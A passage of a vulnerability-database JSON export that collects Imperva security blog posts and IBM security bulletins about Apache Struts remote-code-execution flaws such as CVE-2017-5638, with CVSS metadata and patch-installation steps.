"LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-9791", "CVE-2017-5638"], "modified": "2017-07-13T19:12:31", "href": "https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/", "id": "IMPERVABLOG:DA39045C8E700086C560AAFFDBA589A6", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-25T19:52:24", "description": "I recently took a step back to review all the content we shared in 2017 on the Imperva blog. We covered a broad range of topics including data security, cloud migration, application and API security, AI and machine learning, cybersecurity research, GDPR, insider threats and more. We were busy! Cybersecurity certainly held the world's attention in 2017.\n\nSeveral stories rose to the top as either most read by you, particularly relevant to today's cybersecurity industry or exceptionally newsworthy (and in some cases, all of the above). For an end-of-year reading shortlist, I've compiled our top 10 blog posts from 2017.\n\n## 1\\. What\u2019s Next for Ransomware: Data Corruption, Exfiltration and Disruption\n\nThe WannaCry ransomware attack caught everyone off guard, infecting more than 230,000 computers in 150 countries by encrypting data on networked machines and demanding payments in Bitcoin. We wrote about how to [protect against it](<https://www.imperva.com/blog/2017/05/protect-against-wannacry-with-deception-based-ransomware-detection/>), but our post on [what's next for ransomware](<https://www.imperva.com/blog/2017/05/whats-next-for-ransomware/>) garnered even more attention\u2014it was our most read post of the year.\n\n## 2\\. CVE-2017-5638: Remote Code Execution (RCE) Vulnerability in Apache Struts\n\nApache Struts made headlines all over the place in 2017. The [vulnerability we wrote about in March](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>) hit it big and just kept on going. You might remember it reared its ugly head later in the year when it was tied to the Equifax breach. (We also wrote about two other Apache Struts vulnerabilities: [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>) and [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>).)\n\n## 3\\. Top Insider Threat Concern? Careless Users. [Survey]\n\nWe [surveyed 310 IT security professionals](<https://www.imperva.com/blog/2017/07/top-insider-threat-concern-careless-users-survey/>) at [Infosecurity Europe](<http://www.infosecurityeurope.com/>) in June on their thoughts on insider threats. The big reveal? More than half (59 percent) were concerned not primarily about malicious users, but about the careless ones who unwittingly put their organization\u2019s data at risk. (We shared more about insider threats in this [infographic](<https://www.imperva.com/blog/2017/05/thwart-insider-threats-with-machine-learning-infographic/>).)\n\n## 4\\. Uncover Sensitive Data with the Classifier Tool\n\nIn July we launched Classifier, a free data classification tool that allows organizations to quickly uncover sensitive data in their databases. The response was immediate\u2014over 500 [downloads ](<https://www.imperva.com/lg/lgw_trial.asp?pid=582>)and counting\u2014not surprising given it helps jump start the path to compliance with the GDPR. [Our blog post ](<https://www.imperva.com/blog/2017/07/uncover-sensitive-data-with-the-classifier-tool/>)walked through the steps of how to use the tool.\n\n## 5\\. Professional Services for GDPR Compliance\n\nSpeaking of the GDPR, the new data protection regulation coming out of the EU was on everyone's radar this year. We wrote a LOT about GDPR, including [who is subject to the regulation](<https://www.imperva.com/blog/2017/02/gdpr-series-part-1-gdpr-apply/>), [what rules require data protection technology](<https://www.imperva.com/blog/2017/03/gdpr-series-part-2-rules-require-data-protection-technology/?utm_source=socialmedia&utm_medium=organic_empshare&utm_campaign=2017_Q1_GDPRPart2>), and the [penalties for non-compliance.](<https://www.imperva.com/blog/2017/03/gdpr-series-part-4-penalties-non-compliance/>) However, our post on the [professional services we offer for GDPR compliance](<https://www.imperva.com/blog/2017/10/professional-services-for-gdpr-compliance/>) drove the most traffic on this topic by far.\n\n## 6\\. The Evolution of Cybercrime and What It Means for Data Security\n\nHackers tactics may change, but what they\u2019re after doesn\u2019t\u2014your data. Stealing or obstructing access to enterprise data is the foundation of the cybercrime value chain. We discussed how the [changing nature of cybercrime](<https://www.imperva.com/blog/2017/06/the-evolution-of-cybercrime-and-what-it-means-for-data-security/>) and app and data accessibility create risk and the essentials of application and data protection in this ever-changing world.\n\n## 7\\. Move Securely to the Cloud: WAF Requirements and Deployment Options\n\nMoving to the cloud has become an overwhelmingly popular trend even among those who were at first reluctant to make the move. In this post, we discussed [requirements and deployment options for evaluating a WAF for the cloud](<https://www.imperva.com/blog/2017/06/waf-requirements-and-deployment-options-for-the-cloud/>). (We also wrote about the [benefits of a hybrid WAF deployment ](<https://www.imperva.com/blog/2017/11/cloud-waf-versus-on-premises-waf/>)and the pros and cons of both cloud and on-prem WAFs.)\n\n## 8\\. Clustering and Dimensionality Reduction: Understanding the \u201cMagic\u201d Behind Machine Learning\n\nEverywhere you turned in 2017 you heard about AI and machine learning and the impact they're having, or will have, on essentially everything. Two of Imperva's top cybersecurity researchers explained in detail [some of the techniques used in machine learning](<https://www.imperva.com/blog/2017/07/clustering-and-dimensionality-reduction-understanding-the-magic-behind-machine-learning/>) and how they're applied to solve for identifying improper access to unstructured data. (Those two researchers were also awarded a patent for their machine learning work this year!)\n\n## 9\\. Can a License Solve Your Cloud Migration Problem?\n\nGartner published their [2017 Magic Quadrant for Web Application Firewalls ](<https://www.imperva.com/blog/2017/08/gartner-magic-quadrant-for-wafs-a-leader-four-consecutive-years/>)(WAF) in August and Imperva was once again named a WAF leader, making it four consecutive years. We stood out for offering security solutions for today's changing deployment and infrastructure model. [In this post](<https://www.imperva.com/blog/2017/11/license-solve-cloud-migration-problem/>) we wrote about our flexible licensing program, which lies at the core of the move to the cloud: helping customers secure apps wherever they need, whenever they need, for one price.\n\n## 10\\. The Uber Breach and the Case for Data Masking\n\nLast but not least, we couldn't ignore the Uber breach. Hard to believe in today's world that log in credentials were shared in a public, unsecured forum, but that's what happened. The breach did highlight an important issue, that of production data being used in development environments. It's a bad idea; [we explained why in this post](<https://www.imperva.com/blog/2017/11/uber-breach-case-data-masking/>). Had data masking been used at Uber, hackers would have been left with worthless data, or as we called it, digital fools gold.", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-12-18T17:43:16", "type": "impervablog", "title": "Imperva\u2019s Top 10 Blogs of 2017", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-12-18T17:43:16", "id": "IMPERVABLOG:9AF395FCAE299375F787DBC7B797E713", "href": "https://www.imperva.com/blog/2017/12/impervas-top-10-blogs-of-2017/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-09-21T16:39:07", "description": "People used to argue about whether cyber security is a business problem or a technical problem. But this frames the issue poorly. \u201cProblem\u201d and \u201csolution\u201d imply that there is a definitive \u201csolve.\u201d\n\nCybercrime isn\u2019t a technical problem that can be definitively solved. It is an inherent business risk of having something of value. And risk can\u2019t be solved. Risk can only be managed.\n\nThe thing that differentiates cyber security from almost any other IT discipline (disaster recovery and business continuity in a post 9/11 world is another) is that with cyber security there is an adversary, and that adversary is motivated and incented to beat you. And if you have something of value to them, and if their reward outweighs their risk, they will continually evolve their tactics to get to it.\n\nBusiness-driven digital transformation is driving exponential growth in the number of knowledge workers, websites, mobile apps, APIs, file servers, databases, etc. Each of these enable our businesses to collect, generate and/or use data to competitive advantage.\n\nIn security parlance, this is known as \u201csurface area\u201d; that which is exposed to an attacker. Each is either an end target of the cybercriminal, or a vector a cybercriminal uses to get to data. The more our businesses digitize, the more surface area there will be. Most of this surface area (the big exception is people themselves) is manifested as technology.\n\n## What\u2019s this got to do with Apache Struts?\n\n[Apache Struts](<http://struts.apache.org/>) \u2013 and you\u2019d have to work hard to find something that initially seems more disconnected from business risk as Apache Struts \u2013 illustrates this.\n\nApache Struts is a framework that extends the Java Servlet API for writing web/mobile/API-based applications. Digital transformation means more apps. More apps mean more use of frameworks like Struts. Which means more technical surface area exposed to attackers. This illustrates why \u201cjust reduce surface area\u201d alone isn\u2019t a strategy. Less surface area means less apps, which would mean less digital transformation itself. Given the perceived cost and revenue-side business benefits of digital transformation, this is not likely to happen.\n\nStruts, and other similar frameworks, basically enable developers to write Java apps faster. Struts has been around, in one form or another, since 2000. The current framework \u2013 [Apache Struts 2](<https://en.wikipedia.org/wiki/Apache_Struts_2>) \u2013 was initially released in 2007. Some estimate it is used by 65 percent of the Fortune 500.\n\nOur [research team](<https://www.imperva.com/DefenseCenter>) \u2013 which is the same team that releases our WAF signatures/virtual patches for known vulnerabilities \u2013 collected the following stats on Struts:\n\n * 75 published security vulnerabilities to date\n * 83% of the vulnerabilities can be accessed via a remote attacker (i.e., via network)\n * 75% of the vulnerabilities have working exploits\n * 35% of the vulnerabilities may allow remote code execution (RCE) attacks\n\n### What is RCE?\n\n[RCE](<https://www.imperva.com/blog/2017/01/remote-code-execution-rce-attacks-apache-struts/>) is nasty. IMHO, nastier than the more famous/infamous application vulnerability [SQL injection](<https://www.imperva.com/app-security/threatglossary/sql-injection/>). RCE, or remote code execution, allows an attacker to replace the parameters normally submitted as part of an API call with malicious code. Crafted carefully, this malicious code will then execute on the server. What this malicious code does is up to the attacker. Given that web apps frequently access back-end data stores, the potential for a RCE vulnerability to be exploited to breach data is apparent.\n\nIn 2017, there have been four different Apache Struts RCE vulnerabilities:\n\n * CVE-2017-12611\n * [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>)\n * [CVE-2017-9791](<https://www.imperva.com/blog/2017/07/cve-2017-9791-rce-in-struts-showcase-app-in-struts-1-plugin/>)\n * [CVE-2017-5638](<https://www.imperva.com/blog/2017/03/cve-2017-5638-new-remote-code-execution-rce-vulnerability-in-apache-struts-2/>)\n\nA close look at these shows several strategies for both reactively and proactively protecting application surface area. These certainly apply to Apache Struts, but also to most application frameworks.\n\n## Ways to Protect Application Surface Area\n\n### Patch Servers\n\nThe long-term fix for a vulnerability is to patch the servers. However, rolling out a patch across thousands of servers running hundreds of different apps owned by tens of different app teams is a not a trivial task. It can take months. Which is why most servers aren\u2019t at current patch levels.\n\nThere is another bit of nastiness around patching as well. Sometimes patches aren\u2019t backwards compatible. [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>) contains this: _\u201cIt is possible that some REST actions stop working because of applied default restrictions on available classes.\u201d _In layman\u2019s terms, this means applying the patch can break an existing app. This gets to the heart of why security is risk management: deciding to apply a patch prior to testing a patch with all apps runs the risk of breaking the apps (a.k.a., \u201cpotentially bringing down a website\u201d).\n\n### Virtual Patching\n\nA virtual patch uses a gateway (WAF, IDS, network firewall) that monitors traffic to identify and block an attack before it reaches a web server. _Note, not all types of security gateways can apply a virtual patch to all types of vulnerabilities. _\n\nFor Struts CVE-2017-9805, Imperva used the [ThreatRadar](<https://www.imperva.com/Products/ThreatRadarSubscriptions>) Emergency Feed to distribute a signature and a corresponding virtual patch to SecureSphere Web Application Firewall users within 48 hours of the CVE\u2019s disclosure. Emergency Feed is an opt-in service that leverages the communication channel between SecureSphere and the Imperva cloud to automatically distribute signatures and associated policies to mitigate highly critical vulnerabilities. This in effect automatically deploys a virtual patch for the vulnerability. A policy accomplishing the same thing was uploaded to Incapsula in the same timeframe, accomplishing the same thing for any Incapsula WAF customers.\n\nVirtual patches for known CVEs are useful, but they are reactive. They are predicated upon knowing about a vulnerability in the first place. There is no (despite what some may say) general signature that spans all RCEs. The following are proactive defenses that can be used to protect against application vulnerabilities (RCE and otherwise).\n\n### Reputation-based Blocking\n\nThe vast majority of attacks launched against web app frameworks are automated. For example, for [CVE-2017-9805](<https://www.imperva.com/blog/2017/09/cve-2017-9805-analysis-of-apache-struts-rce-vulnerability-in-rest-plugin/>), 40% of the attacks tracked by our research team originated from a single server in China. There is no reason for any traffic from any source like this to be reaching web servers. Imperva ThreatRadar IP Reputation can be set to fetch the latest IP Reputation feeds several times an hour. While this won\u2019t catch every instance of an attack, it is an excellent filter that will proactively block a large portion of the automated attacks that target web apps.\n\n### Anti-automation\n\nIP reputation isn\u2019t the only mechanism for stopping automated attacks. Both SecureSphere and Incapsula provide functionality for identifying and blocking bots, regardless of the bot\u2019s intent. Both use the same underlying technology to progressively profile a request to determine if the request is a human or a bot, and if a bot a good bot or a bad bot. Identifying and blocking requests from bad bots is another technique for scrubbing automated attacks targeting web apps.\n\n### Web Application Firewall Zero Day Protections\n\nReputation and anti-automation are extremely effective at filtering automated attacks from bad actors, but a careful attacker will be able to mask itself, especially when focusing upon a specific app or enterprise.\n\nHowever, to exploit an RCE vulnerability in every case the attacker needs to send the malicious code \u2013 the \u201cpayload\u201d \u2013 to the app in question. This payload will look wildly different from the typical content (e.g., an API call) submitted to an app. By learning what payloads are normally submitted via various form submissions and API calls, a solid WAF can prevent something like CVE-2017-9805 without knowing the vulnerability exists, and without ever seeing the payload before. The SecureSphere WAF uses machine learning to understand how an application normally behaves, and then uses it to identify and block anomalous requests.\n\nImperva zero day protections identified Apache Struts exploits almost immediately via a few different mechanisms:\n\n * Upon learning of a vulnerability, attackers will frequently \u201cspray and pray\u201d an attack against numerous apps, and various forms/APIs within an app. Given automation, its more cost effective for them to just broadly launch an attack than it is first determine if an app/API is even vulnerable. We saw this for CVE-2017-9805 almost immediately, identifying it a \u201cunknown content type for known URL\u201d. In English, this translates to \u201cnot only is this not normal, it isn\u2019t even content that this URL can process.\u201d These kinds of alerts are an early \u201ctell\u201d that something is afoot, and our research team uses them as both an early indicator, as well as to inform our ThreatRadar threat intelligence feeds.\n * If the app is susceptible to the vulnerability, a malicious payload will still not conform to normal application traffic. In the case of CVE-2017-9805, SecureSphere will identify an \u201cunknown parameter\u201d or \u201cparameter type violation.\u201d\n * In most cases, the payload is much larger/longer than a normal request. In these cases, a \u201cparameter length violation\u201d will surface.\n\n## The Role of App Security Domain Expertise\n\nWhat only someone who lives and breathes this stuff on a day-in/day-out basis knows is that any one of these violations by themselves isn\u2019t necessarily an attack. Policies built on evaluating any of this in isolation can result in a high rate of false positives. False positives are the bane of IT security\u2019s existence, _because when looking at a screen full of alerts, you don\u2019t know which ones are false and which aren\u2019t. _The net effect is ignoring them all.\n\nSecureSphere WAF has [patented capabilities](<https://www.imperva.com/Products/AdvancedTechnologies>) that evaluate the relationships between multiple violations. This ability to analyze seemingly independent violations coming from different layers of the app stack (e.g., network protocol, parameter length, IP reputation, etc.) together greatly enhances accuracy. This not only minimizes false positives, but more importantly provides the confidence to actually _block_ requests.\n\n## Manage Business Risk, Protect Against App Exploits\n\nAccording to the [2017 Verizon Data Breach Investigation Report](<http://www.verizonenterprise.com/verizon-insights-lab/dbir/2017/>) more successful breaches resulted from attacks on web apps than any other type of attack. This is telling since web app attacks are only number four in terms of incident frequency.\n\nAttackers realize that web app frameworks like Struts (and all frameworks have security issues) are particularly attractive targets. Since they are used for public facing web apps, they can\u2019t be hidden behind layers of network security. Their role is to accept inputs (web form parameters, API calls, etc.) and then process these inputs, which directly maps to particularly dangerous exploits like SQL injection and RCE. Since frameworks are widely adopted, attackers automate their attacks so they can cost effectively leverage their effort across thousands of websites.\n\nBusiness will roll out more application functionality. The cost savings and revenue generating opportunities from digital transformation pretty much guarantee we\u2019ll have more app surface area next year than this year. Learn more about how to use these capabilities to protect this ever growing surface area with Imperva SecureSphere [Web Application Firewall (WAF)](<https://www.imperva.com/Products/WebApplicationFirewall-WAF>) and [Imperva Incapsula WAF](<https://www.incapsula.com/website-security/web-application-firewall.html>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2017-09-18T20:33:25", "title": "Apache Struts, RCE and Managing App Risk", "type": "impervablog", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12611", "CVE-2017-5638", "CVE-2017-9791", "CVE-2017-9805"], "modified": "2017-09-18T20:33:25", "href": "https://www.imperva.com/blog/2017/09/apache-struts-rce-and-managing-app-risk/", "id": "IMPERVABLOG:C40BB28F51D206C8BB23721D1ECED353", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ibm": [{"lastseen": "2023-02-21T21:52:21", "description": "## Summary\n\nAn Apache Struts vulnerability of arbitrary code execution was addressed by IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation.\n\n## Vulnerability Details\n\nCVEID: [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) **DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. CVSS Base Score: 7.3 CVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score CVSS Environmental Score*: Undefined CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nPlatform Cluster Manager Standard Edition Version 4.1.0, 4.1.1 and 4.1.1.1 \nPlatform Cluster Manager Advanced Edition Version 4.2.0, 4.2.0.1, 4.2.0.2 and 4.2.1 \nPlatform HPC Version 4.1.1, 4.1.1.1, 4.2.0 and 4.2.1 \nSpectrum Cluster Foundation 4.2.2\n\n## Remediation/Fixes\n\n_&lt;Product_\n\n| _VRMF_| _APAR_| _Remediation/First Fix_ \n---|---|---|--- \n_Platform Cluster Manager Standard Edition_| _4.1.0, 4.1.1, 4.1.1.1, 4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform Cluster Manager Advanced Edition_| _4.2.0, 4.2.0.1, 4.2.0.2, 4.2.1_| _None_| _See workaround_ \n_Platform HPC_| _4.1.1, 4.1.1.1, 4.2.0, 4.2.1_| _None_| _See workaround_ \n_Spectrum Cluster Foundation_| _4.2.2_| _None_| _See workaround_ \n \n## Workarounds and Mitigations\n\nPlatform Cluster Manager 4.2.1 &amp; Platform HPC 4.2.1 &amp; Spectrum Cluster Foundation 4.2.2 \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.32/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n# mkdir -p /root/backup \n# mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/wlp/usr/servers/platform/apps/platform.war/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.2.0 4.2.0.x &amp; Platform HPC 4.2.0 4.2.0.x** \n \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node. \n4 # mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n \n5 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pcmadmin service stop --service WEBGUI # pcmadmin service start --service WEBGUI \n \n**Platform Cluster Manager 4.1.x &amp; Platform HPC 4.1.x** \n1 Download the struts-2.3.32-lib.zip package from the following location:[_http://archive.apache.org/dist/struts/2.3.32/_](<http://archive.apache.org/dist/struts/2.3.28/>) \n2 Copy the struts-2.3.32-lib.zip package to the management node. \n3 Extract the struts-2.3.32-lib.zip package on the management node \n# mkdir -p /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-json-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/struts2-spring-plugin-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/xwork-core-* /root/backup # mv /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib/freemarker-* /root/backup \n \n# unzip struts-2.3.32-lib.zip # cd struts-2.3.32/lib/ # cp xwork-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-core-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-json-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-spring-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp freemarker-2.3.22.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib # cp struts2-jasperreports-plugin-2.3.32.jar /opt/pcm/web-portal/gui/3.0/tomcat/webapps/platform/WEB-INF/lib \n4 Restart Platform HPC services. If high availability is enabled, run the following commands on the active management node: \n# pcmhatool failmode -m manual # pmcadmin stop # pmcadmin start # pcmhatool failmode -m auto \nOtherwise, if high availability is not enabled, run the following commands on the management node: \n# pmcadmin stop # pmcadmin start \n \n \nIf providing a mitigation add this line to this section: \nIBM recommends that you review your entire environment to identify vulnerable releases of the Open Source Apache Struts Vulnerabilities Collections and take appropriate mitigation and remediation actions. \n \n \n**Important note: **IBM strongly suggests that all System z customers subscribe to the System z Security Portal to receive the latest critical System z security and integrity service. If you are not subscribed, see the instructions on the [_System z Security web site_](<http://www.ibm.com/systems/z/solutions/security_subintegrity.html>). Security and integrity APARs and associated fixes will be posted to this portal. IBM suggests reviewing the CVSS scores and applying all security or integrity fixes as soon as possible to minimize any potential risk.\n\n## ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2018-06-18T01:35:33", "type": "ibm", "title": "Security Bulletin: Apache Struts v2 Jakarta Multipart parser code execution affects IBM Platform Cluster Manager Standard Edition, IBM Platform Cluster Manager Advanced Edition, Platform HPC, and Spectrum Cluster Foundation (CVE-2017-5638)", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5638"], "modified": "2018-06-18T01:35:33", "id": "48F6A099D2817EC515107FFC49C4E17438FAC35AB50A0F0C6F0B86E2F20FECE3", "href": "https://www.ibm.com/support/pages/node/630909", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-02-21T05:52:33", "description": "## Summary\n\nIBM Sterling Order Management use Apache Struts 2 and is affected by some of the vulnerabilities that exist in Apache Struts 2\n\n## Vulnerability Details\n\n**CVEID:** [_CVE-2017-5638_](<https://vulners.com/cve/CVE-2017-5638>) \n**DESCRIPTION:** Apache Struts could allow a remote attacker to execute arbitrary code on the system, caused by an error when performing a file upload based on Jakarta Multipart parser. An attacker could exploit this vulnerability using a malicious Content-Type value to execute arbitrary code on the system. \nCVSS Base Score: 7.3 \nCVSS Temporal Score: See [_https://exchange.xforce.ibmcloud.com/vulnerabilities/122776_](<https://exchange.xforce.ibmcloud.com/vulnerabilities/122776>) for the current score \nCVSS Environmental Score*: Undefined \nCVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L)\n\n## Affected Products and Versions\n\nIBM Sterling Selling and Fulfillment Foundation 9.1.0 \nIBM Sterling Selling and 